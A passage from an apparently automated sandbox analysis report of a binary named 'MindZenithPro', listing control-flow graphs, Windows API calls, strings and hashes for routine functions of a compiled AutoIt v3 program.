3cb81d 134->177 178 4187a0 134->178 137->138 154 4189c1 138->154 155 4189c4-4189c8 138->155 140->66 144->66 162 41896a-418975 call 3ca344 147->162 163 41895f 147->163 148->144 151->66 181 4186be-4186c7 call 3db46f 151->181 182 4185db-4185e6 call 3c7467 152->182 153->182 154->155 155->71 169 4189e0-4189e3 157->169 170 4189dd 157->170 158->66 159->68 194 418661 161->194 195 418650-41865f call 3cb81d 161->195 162->148 162->157 163->140 169->19 170->169 201 418570-418577 172->201 173->201 189 4187a4-4187ab 177->189 178->189 206 4186c9-4186d8 call 3cb81d 181->206 207 4186da 181->207 182->66 197 4187b7 call 3c2f14 189->197 198 4187ad-4187b2 call 3c3989 189->198 203 418665-418670 call 3e9314 194->203 195->203 211 4187bc 197->211 198->66 201->66 203->9 218 418676-41867c 203->218 213 4186de-418701 206->213 207->213 211->66 216 418703-41870a 213->216 217 41870f-418712 213->217 216->217 219 418722-418725 217->219 220 418714-41871d 217->220 218->66 221 418735-418738 219->221 222 418727-418730 219->222 220->219 221->66 223 41873e-41874c 221->223 222->221 223->66
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ,E$8E$P*I$U#I$d0b$d10m0$d1b$d1r0,2$d5m0$dE$i$(I$(I$E
                                    • API String ID: 0-3393365931
                                    • Opcode ID: 1021b56041671c064658bc14265d68054984fc8a9d29eeb8e70399566b42f38d
                                    • Instruction ID: 9f97c9ffc94901528e4bf617fb2faa1b937990ef656399a8cf83245fbffc2b3f
                                    • Opcode Fuzzy Hash: 1021b56041671c064658bc14265d68054984fc8a9d29eeb8e70399566b42f38d
                                    • Instruction Fuzzy Hash: 316259B1508341DFC725DF24D184AAAFBE0BF88304F14896EE8998B352DB75D949CF86
                                    Function 003CDCC0 Relevance: 21.6, APIs: 14, Instructions: 644sleepsynchronizationtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetInputState.USER32 ref: 003CDDA7
                                    • timeGetTime.WINMM ref: 003CDFA7
                                    • Sleep.KERNEL32(0000000A), ref: 003CE151
                                    • Sleep.KERNEL32(0000000A), ref: 0041310C
                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 004131A7
                                    • WaitForSingleObject.KERNEL32(?,00000000), ref: 004131BF
                                    • CloseHandle.KERNEL32(?), ref: 004131D3
                                    • Sleep.KERNEL32(?,CCCCCCCC,00000000), ref: 0041323F
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Sleep$CloseCodeExitHandleInputObjectProcessSingleStateTimeWaittime
                                    • String ID:
                                    • API String ID: 388478766-0
                                    • Opcode ID: be595c2abf66bcb917c947d2eb3533a279334a8439e90a2ac25b1bc7514e21e1
                                    • Instruction ID: c12c0a9d962ec49265bc7581525ff535bb4782d15da6e96cc6c04c476cd5db26
                                    • Opcode Fuzzy Hash: be595c2abf66bcb917c947d2eb3533a279334a8439e90a2ac25b1bc7514e21e1
                                    • Instruction Fuzzy Hash: 7942DC70608245EFD72ADF24C884FAAB7A4BF45304F14452EF45ACB291D7B8EC94CB86
                                    Function 003C3AE4 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 201registryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 003C3DD1: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00402A98,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 003C3DEF
                                      • Part of subcall function 003C3A75: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003C3A97
                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003C3C01
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004039E6
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00403A27
                                    • RegCloseKey.ADVAPI32(?), ref: 00403A69
                                    • _wcslen.LIBCMT ref: 00403AD0
                                    • _wcslen.LIBCMT ref: 00403ADF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\$3I$3I
                                    • API String ID: 98802146-440925561
                                    • Opcode ID: c9a96baed290508d10d8608f3cf93cb0190d0c56f622fa256fa079af085520b0
                                    • Instruction ID: 36fb7f77a360b0661d7bbe53325ecbacddd55a51ef187b68a776e4257c038e3e
                                    • Opcode Fuzzy Hash: c9a96baed290508d10d8608f3cf93cb0190d0c56f622fa256fa079af085520b0
                                    • Instruction Fuzzy Hash: D471BD71544300AEC321DF65E881AABBBE8FF65741F40493FF840DB2A1DB709A48CB5A
                                    Function 003C2F92 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145windowtimeregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 593 3c2f92-3c2fa7 594 3c2fa9-3c2fac 593->594 595 3c3007-3c3009 593->595 596 3c300d 594->596 597 3c2fae-3c2fb5 594->597 595->594 598 3c300b 595->598 602 403084-4030ac call 3c4286 call 3df09a 596->602 603 3c3013-3c3018 596->603 599 3c2fbb-3c2fc0 597->599 600 3c3087-3c308f PostQuitMessage 597->600 601 3c2ff2-3c2ffa DefWindowProcW 598->601 604 4030f1-403105 call 42c631 599->604 605 3c2fc6-3c2fca 599->605 608 3c303b-3c303d 600->608 607 3c3000-3c3006 601->607 638 4030b1-4030b8 602->638 609 3c303f-3c3066 SetTimer RegisterWindowMessageW 603->609 610 3c301a-3c301d 603->610 604->608 630 40310b 604->630 611 3c2fd0-3c2fd5 605->611 612 3c3091-3c309b call 3dfc73 605->612 608->607 609->608 613 3c3068-3c3073 CreatePopupMenu 609->613 616 403025-403028 610->616 617 3c3023-3c3036 KillTimer call 3c2f14 call 3c47a8 610->617 618 4030d6-4030dd 611->618 619 3c2fdb-3c2fe0 611->619 632 3c30a0 612->632 613->608 623 403060-40307f MoveWindow 616->623 624 40302a-40302e 616->624 617->608 618->601 627 4030e3-4030ec call 4211b9 618->627 628 3c3075-3c3085 call 3c30a2 619->628 629 3c2fe6-3c2fec 619->629 623->608 633 403030-403033 624->633 634 40304f-40305b SetFocus 624->634 627->601 628->608 629->601 629->638 630->601 632->608 633->629 639 403039-40304a call 3c4286 633->639 634->608 638->601 643 4030be-4030d1 call 3c2f14 call 3c3989 638->643 639->608 643->601
                                    APIs
                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,003C2F8C,?,?), ref: 003C2FFA
                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,003C2F8C,?,?), ref: 003C3026
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003C3049
                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,003C2F8C,?,?), ref: 003C3054
                                    • CreatePopupMenu.USER32 ref: 003C3068
                                    • PostQuitMessage.USER32(00000000), ref: 003C3089
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                    • String ID: $I$ $I$TaskbarCreated
                                    • API String ID: 129472671-185514416
                                    • Opcode ID: 8bdcb4bb42190afff86e8e7f2f3ae07b853f84b09be25fd5f615fe245d4b7aa6
                                    • Instruction ID: 0b82d82d4d2d5b735a00cbde2776a3a3f0c799d84cb85154279c79539630ed31
                                    • Opcode Fuzzy Hash: 8bdcb4bb42190afff86e8e7f2f3ae07b853f84b09be25fd5f615fe245d4b7aa6
                                    • Instruction Fuzzy Hash: 4C412672204264BBDB3A1F789D49F7A3E68EB54301F04813FF903DA291C7B98E41975A
                                    Function 003C29BC Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 003C29EF
                                    • RegisterClassExW.USER32(00000030), ref: 003C2A19
                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003C2A2A
                                    • InitCommonControlsEx.COMCTL32(?), ref: 003C2A47
                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003C2A57
                                    • LoadIconW.USER32(000000A9), ref: 003C2A6D
                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003C2A7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                    • API String ID: 2914291525-1005189915
                                    • Opcode ID: a4e16d750e1890a672fd9f5afccc11353004d4c49e7420a2640c09e66469b976
                                    • Instruction ID: afdb25a42b8b403cbbcc58f6ff24692c58fddebc58cdab30972090e0abfda3ca
                                    • Opcode Fuzzy Hash: a4e16d750e1890a672fd9f5afccc11353004d4c49e7420a2640c09e66469b976
                                    • Instruction Fuzzy Hash: 6421F4B1E01308AFDB109FA4ED49B9DBBB4FB0C715F10413AF911A62A1D7B585448F99
                                    Function 003F9095 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 650 3f9095-3f90a5 651 3f90bf-3f90c1 650->651 652 3f90a7-3f90ba call 3f2b55 call 3f2b68 650->652 653 3f9429-3f9436 call 3f2b55 call 3f2b68 651->653 654 3f90c7-3f90cd 651->654 670 3f9441 652->670 671 3f943c call 3f2aac 653->671 654->653 656 3f90d3-3f90fe 654->656 656->653 659 3f9104-3f910d 656->659 662 3f910f-3f9122 call 3f2b55 call 3f2b68 659->662 663 3f9127-3f9129 659->663 662->671 668 3f912f-3f9133 663->668 669 3f9425-3f9427 663->669 668->669 674 3f9139-3f913d 668->674 672 3f9444-3f9449 669->672 670->672 671->670 674->662 677 3f913f-3f9156 674->677 679 3f9158-3f915b 677->679 680 3f9173-3f917c 677->680 683 3f915d-3f9163 679->683 684 3f9165-3f916e 679->684 681 3f917e-3f9195 call 3f2b55 call 3f2b68 call 3f2aac 680->681 682 3f919a-3f91a4 680->682 713 3f935c 681->713 686 3f91ab-3f91c9 call 3f3b70 call 3f2d18 * 2 682->686 687 3f91a6-3f91a8 682->687 683->681 683->684 688 3f920f-3f9229 684->688 717 3f91cb-3f91e1 call 3f2b68 call 3f2b55 686->717 718 3f91e6-3f920c call 3f9774 686->718 687->686 690 3f922f-3f923f 688->690 691 3f92fd-3f9306 call 3ffbee 688->691 690->691 695 3f9245-3f9247 690->695 702 3f9379 691->702 703 3f9308-3f931a 691->703 695->691 699 3f924d-3f9273 695->699 699->691 704 3f9279-3f928c 699->704 706 3f937d-3f9395 ReadFile 702->706 703->702 708 3f931c-3f932b GetConsoleMode 703->708 704->691 709 3f928e-3f9290 704->709 711 3f9397-3f939d 706->711 712 3f93f1-3f93fc GetLastError 706->712 708->702 714 3f932d-3f9331 708->714 709->691 715 3f9292-3f92bd 709->715 711->712 721 3f939f 711->721 719 3f93fe-3f9410 call 3f2b68 call 3f2b55 712->719 720 3f9415-3f9418 712->720 723 3f935f-3f9369 call 3f2d18 713->723 714->706 722 3f9333-3f934d ReadConsoleW 714->722 715->691 724 3f92bf-3f92d2 715->724 717->713 718->688 719->713 732 3f941e-3f9420 720->732 733 3f9355-3f935b call 3f2b32 720->733 729 3f93a2-3f93b4 721->729 730 3f934f GetLastError 722->730 731 3f936e-3f9377 722->731 723->672 724->691 725 3f92d4-3f92d6 724->725 725->691 736 3f92d8-3f92f8 725->736 729->723 740 3f93b6-3f93ba 729->740 730->733 731->729 732->723 733->713 736->691 744 3f93bc-3f93cc call 3f8db1 740->744 745 3f93d3-3f93de 740->745 756 3f93cf-3f93d1 744->756 750 3f93ea-3f93ef call 3f8bf1 745->750 751 3f93e0 call 3f8f01 745->751 757 3f93e5-3f93e8 750->757 751->757 756->723 757->756
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ~>
                                    • API String ID: 0-1356106926
                                    • Opcode ID: d4ff8d315c1e9d6bf644c9a88e959535bbb19ddc5cebbdf444569f24059e7150
                                    • Instruction ID: 5a46eb15a4d224ddc526b70b1b79e0a8b356b0f3a1c22e5c8299a6b9251422c5
                                    • Opcode Fuzzy Hash: d4ff8d315c1e9d6bf644c9a88e959535bbb19ddc5cebbdf444569f24059e7150
                                    • Instruction Fuzzy Hash: 9DC1C274E0424EAFDF13DFA9C841BBEBBB4AF19300F154196EA14AB392C7349941CB61
                                    Function 004009AE Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 758 4009ae-4009de call 400782 761 4009e0-4009eb call 3f2b55 758->761 762 4009f9-400a05 call 3f5571 758->762 767 4009ed-4009f4 call 3f2b68 761->767 768 400a07-400a1c call 3f2b55 call 3f2b68 762->768 769 400a1e-400a67 call 4006ed 762->769 778 400cd0-400cd6 767->778 768->767 776 400ad4-400add GetFileType 769->776 777 400a69-400a72 769->777 782 400b26-400b29 776->782 783 400adf-400b10 GetLastError call 3f2b32 CloseHandle 776->783 780 400a74-400a78 777->780 781 400aa9-400acf GetLastError call 3f2b32 777->781 780->781 787 400a7a-400aa7 call 4006ed 780->787 781->767 785 400b32-400b38 782->785 786 400b2b-400b30 782->786 783->767 797 400b16-400b21 call 3f2b68 783->797 790 400b3c-400b8a call 3f54ba 785->790 791 400b3a 785->791 786->790 787->776 787->781 801 400b9a-400bbe call 4004a0 790->801 802 400b8c-400b98 call 4008fe 790->802 791->790 797->767 808 400bc0 801->808 809 400bd1-400c14 801->809 802->801 807 400bc2-400bcc call 3f89fe 802->807 807->778 808->807 811 400c35-400c43 809->811 812 400c16-400c1a 809->812 815 400c49-400c4d 811->815 816 400cce 811->816 812->811 814 400c1c-400c30 812->814 814->811 815->816 817 400c4f-400c82 CloseHandle call 4006ed 815->817 816->778 820 400c84-400cb0 GetLastError call 3f2b32 call 3f5683 817->820 821 400cb6-400cca 817->821 820->821 821->816
                                    APIs
                                      • Part of subcall function 004006ED: CreateFileW.KERNELBASE(00000000,?,?,W@,?,?,00000000,?,00400A57,00000000,0000000C), ref: 0040070A
                                    • GetLastError.KERNEL32 ref: 00400AC2
                                    • __dosmaperr.LIBCMT ref: 00400AC9
                                    • GetFileType.KERNELBASE(00000000), ref: 00400AD5
                                    • GetLastError.KERNEL32 ref: 00400ADF
                                    • __dosmaperr.LIBCMT ref: 00400AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00400B08
                                    • CloseHandle.KERNEL32(?), ref: 00400C52
                                    • GetLastError.KERNEL32 ref: 00400C84
                                    • __dosmaperr.LIBCMT ref: 00400C8B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: H
                                    • API String ID: 4237864984-2852464175
                                    • Opcode ID: ee6808fb73df7e7b89f633af2cc14ed79fe6a4bf269c3c0419590f103cef6ea1
                                    • Instruction ID: f087246ca585f983f2b81d6ed02e22c17eb959b1a248a4722321d160acf8187c
                                    • Opcode Fuzzy Hash: ee6808fb73df7e7b89f633af2cc14ed79fe6a4bf269c3c0419590f103cef6ea1
                                    • Instruction Fuzzy Hash: FCA11732A142488FDF19DF68D851BBE7BA1AB06324F14016AF811AF3D2D7399D12CB59
                                    Function 003C286B Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 003C2876
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 003C2885
                                    • LoadIconW.USER32(00000063), ref: 003C289B
                                    • LoadIconW.USER32(000000A4), ref: 003C28AD
                                    • LoadIconW.USER32(000000A2), ref: 003C28BF
                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 003C28D7
                                    • RegisterClassExW.USER32(?), ref: 003C2928
                                      • Part of subcall function 003C29BC: GetSysColorBrush.USER32(0000000F), ref: 003C29EF
                                      • Part of subcall function 003C29BC: RegisterClassExW.USER32(00000030), ref: 003C2A19
                                      • Part of subcall function 003C29BC: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003C2A2A
                                      • Part of subcall function 003C29BC: InitCommonControlsEx.COMCTL32(?), ref: 003C2A47
                                      • Part of subcall function 003C29BC: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003C2A57
                                      • Part of subcall function 003C29BC: LoadIconW.USER32(000000A9), ref: 003C2A6D
                                      • Part of subcall function 003C29BC: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003C2A7C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                    • String ID: #$0$AutoIt v3
                                    • API String ID: 423443420-4155596026
                                    • Opcode ID: 6c288719e4910855f181fd5487dffb4a8511e6e78efe0c36815cdbe0a28512ed
                                    • Instruction ID: 4a3f4edb0bd877b469fe144ae6fcb89b84f6af2437290f3152495e8e67e994fc
                                    • Opcode Fuzzy Hash: 6c288719e4910855f181fd5487dffb4a8511e6e78efe0c36815cdbe0a28512ed
                                    • Instruction Fuzzy Hash: FA21E974D10318BBDB209FA5ED45A9A7FB4FB58B90F00413BE904A62A1D7F95940CF98
                                    Function 003CE570 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Variable must be of type 'Object'.$d5I$d5I$d5I$d5I$d5Id5I
                                    • API String ID: 0-4243873275
                                    • Opcode ID: 8216b85586803eea707b093dacab13a67b56b9d929423260742b7d92fef0da58
                                    • Instruction ID: 709c950dc0710a03bf281c07351b722f2a7ea2a91111969dc8ed5cb188b5e8d7
                                    • Opcode Fuzzy Hash: 8216b85586803eea707b093dacab13a67b56b9d929423260742b7d92fef0da58
                                    • Instruction Fuzzy Hash: 70C2AA75A00214DFCB25CF58C880FAEB7B5BF08714F25816EE845AB391D779AE81CB94
                                    Function 003C433C Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1339 3c433c-3c4375 1340 3c437b-3c4391 mciSendStringW 1339->1340 1341 403d7f-403d80 DestroyWindow 1339->1341 1342 3c4397-3c439f 1340->1342 1343 3c45f2-3c45ff 1340->1343 1344 403d8b-403d98 1341->1344 1342->1344 1345 3c43a5-3c43b4 call 3c42ae 1342->1345 1346 3c4624-3c462b 1343->1346 1347 3c4601-3c461c UnregisterHotKey 1343->1347 1348 403dc7-403dce 1344->1348 1349 403d9a-403d9d 1344->1349 1360 403dd5-403de1 1345->1360 1361 3c43ba-3c43c2 1345->1361 1346->1342 1352 3c4631 1346->1352 1347->1346 1351 3c461e-3c461f call 3dfe50 1347->1351 1348->1344 1357 403dd0 1348->1357 1353 403da9-403dac FindClose 1349->1353 1354 403d9f-403da7 call 3c6903 1349->1354 1351->1346 1352->1343 1359 403db2-403dbf 1353->1359 1354->1359 1357->1360 1359->1348 1363 403dc1-403dc2 call 433a20 1359->1363 1366 403de3-403de5 FreeLibrary 1360->1366 1367 403deb-403df2 1360->1367 1364 3c43c8-3c43ed call 3cd530 1361->1364 1365 403df9-403e06 1361->1365 1363->1348 1377 3c43ef 1364->1377 1378 3c4424-3c442f OleUninitialize 1364->1378 1369 403e08-403e25 VirtualFree 1365->1369 1370 403e2d-403e34 1365->1370 1366->1367 1367->1360 1368 403df4 1367->1368 1368->1365 1369->1370 1373 403e27-403e28 call 433a86 1369->1373 1370->1365 1374 403e36 1370->1374 1373->1370 1380 403e3b-403e3f 1374->1380 1381 3c43f2-3c4422 call 3c40bd call 3c4101 1377->1381 1379 3c4435-3c443a 1378->1379 1378->1380 1382 403e50-403e5d call 433a5a 1379->1382 1383 3c4440-3c444a 1379->1383 1380->1379 1384 403e45-403e49 call 430876 1380->1384 1381->1378 1395 403e5f 1382->1395 1386 3c4450-3c44d1 call 3cac28 call 3c4158 call 3c42f6 call 3e0164 call 3c4873 call 3cac28 call 3cd530 call 3c430c call 3e0164 1383->1386 1387 3c4633-3c4640 call 3dfc0b 1383->1387 1392 403e4b 1384->1392 1401 403e64-403e86 call 3e011d 1386->1401 1429 3c44d7-3c44fb call 3e0164 1386->1429 1387->1386 1400 3c4646 1387->1400 1392->1379 1395->1401 1400->1387 1407 403e88 1401->1407 1410 403e8d-403eaf call 3e011d 1407->1410 1417 403eb1 1410->1417 1420 403eb6-403ed8 call 3e011d 1417->1420 1426 403eda 1420->1426 1428 403edf-403eec call 426bcd 1426->1428 1434 403eee 1428->1434 1429->1410 1435 3c4501-3c4525 call 3e0164 1429->1435 1437 403ef3-403f00 call 3dbca9 1434->1437 1435->1420 1440 3c452b-3c4545 call 3e0164 1435->1440 1443 403f02 1437->1443 1440->1428 1445 3c454b-3c456f call 3c42f6 call 3e0164 1440->1445 1447 403f07-403f14 call 4339b4 1443->1447 1445->1437 1454 3c4575-3c457d 1445->1454 1453 403f16 1447->1453 1455 403f1b-403f28 call 433a3b 1453->1455 1454->1447 1456 3c4583-3c45a1 call 3cac28 call 3c41e0 1454->1456 1461 403f2a 1455->1461 1456->1455 1465 3c45a7-3c45b5 1456->1465 1464 403f2f-403f3c call 433a3b 1461->1464 1470 403f3e 1464->1470 1465->1464 1467 3c45bb-3c45f1 call 3cac28 * 3 call 3c421a 1465->1467 1470->1470
                                    APIs
                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003C4385
                                    • OleUninitialize.OLE32(?,00000000), ref: 003C4424
                                    • UnregisterHotKey.USER32(?), ref: 003C4609
                                    • DestroyWindow.USER32(?), ref: 00403D80
                                    • FreeLibrary.KERNEL32(?), ref: 00403DE5
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00403E12
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
